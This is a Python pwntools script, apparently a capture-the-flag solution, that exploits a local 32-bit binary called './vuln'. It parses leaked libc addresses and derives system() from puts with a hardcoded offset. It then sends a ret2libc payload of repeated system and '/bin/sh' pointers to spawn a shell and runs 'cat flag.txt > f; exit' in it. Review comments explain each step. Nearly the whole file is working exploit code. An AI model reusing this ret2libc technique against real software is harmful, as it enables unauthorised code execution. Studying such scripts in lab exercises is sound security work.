from pwn import *
import struct
import sys
def string_addr_to_bytes(addr, offset):
    """Pack a leaked hex address plus an offset as a little-endian 32-bit word.

    ``addr`` is the hex text of a leaked pointer (``int(..., 16)`` accepts an
    optional ``0x`` prefix, and on Python 3 also bytes); ``offset`` is added to
    it before packing.  Returns the 4-byte ``<L`` encoding, i.e. what a 32-bit
    target expects on its stack.  ``struct.pack`` raises ``struct.error`` when
    the sum does not fit an unsigned 32-bit word (negative result or a 64-bit
    pointer), which is a useful early failure rather than a silently wrong
    payload.
    """
    target = int(addr, 16) + offset
    return struct.pack('<L', target)
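def _hex_bytes(data):
    """Render ``data`` as space-separated ``0x..`` bytes, e.g. ``0xb0 0xb0 0xe4 0xf7``.

    Iterating a ``bytearray`` yields ints on both Python 2 and 3, so this
    replaces the Python-2-only ``str.encode('hex')`` idiom (which breaks on
    Python 3, where pwntools' ``recvline`` hands back ``bytes``).
    """
    return ' '.join('0x%02x' % b for b in bytearray(data))


def _leaked_addr(line):
    """Return the second whitespace-separated token of a leaked line.

    The script feeds this token to ``int(..., 16)``, so the target is assumed
    to print lines of the form ``<name> <hex-address>`` -- TODO confirm against
    ./vuln's actual output.  ``split()`` already discards the trailing newline,
    so no ``[:-1]`` slice is needed (the old slice would have eaten the last
    hex digit on a line that arrived without a newline).
    """
    return line.split()[1]


if __name__ == '__main__':
    io = process('./vuln')

    # Banner line, one throwaway line, then one leaked line per symbol.
    # The order (puts, fflush, read, write, /bin/sh) is fixed by the binary.
    print(io.recvline())
    io.recvline()
    puts = io.recvline()
    print(puts)
    fflush = io.recvline()
    print(fflush)
    read = io.recvline()
    print(read)
    write = io.recvline()
    print(write)
    binsh = io.recvline()
    print(binsh)

    print(puts)
    putsaddr = string_addr_to_bytes(_leaked_addr(puts), 0)
    print(_hex_bytes(putsaddr))
    print(fflush)
    fflushaddr = string_addr_to_bytes(_leaked_addr(fflush), 0)
    print(_hex_bytes(fflushaddr))
    print(_leaked_addr(binsh))
    binshaddr = string_addr_to_bytes(_leaked_addr(binsh), 0)
    print(_hex_bytes(binshaddr))
    print('system')
    # NOTE(review): 0x2b980 is the puts -> system distance in one specific
    # libc build and is wrong for every other build.  Prefer deriving it from
    # the matching libc with pwntools, e.g.
    #   libc = ELF('/path/to/libc.so.6')
    #   libc.symbols['puts'] - libc.symbols['system']
    # so the exploit does not silently compute a garbage address.
    systemaddr = string_addr_to_bytes(_leaked_addr(puts), -0x2b980)
    print(_hex_bytes(systemaddr))

    print(io.recvline())
    print(io.recvline())
    # Payload: 41 copies of system()'s address followed by 100 copies of the
    # "/bin/sh" pointer.  Presumably the first run overwrites the saved return
    # address with system() and the second run lands where system() reads its
    # argument; the exact counts depend on ./vuln's stack layout, which is not
    # visible here -- verify them if the target is rebuilt.
    io.sendline(systemaddr * 41 + binshaddr * 100)

    print(io.recvline())
    print(io.recvline())
    # Executed by the spawned shell: it writes the flag to ./f on the target
    # side instead of echoing it back, so read ./f afterwards (the single
    # recvline below only captures whatever the shell prints before exiting).
    io.sendline('cat flag.txt > f; exit')
    print(io.recvline())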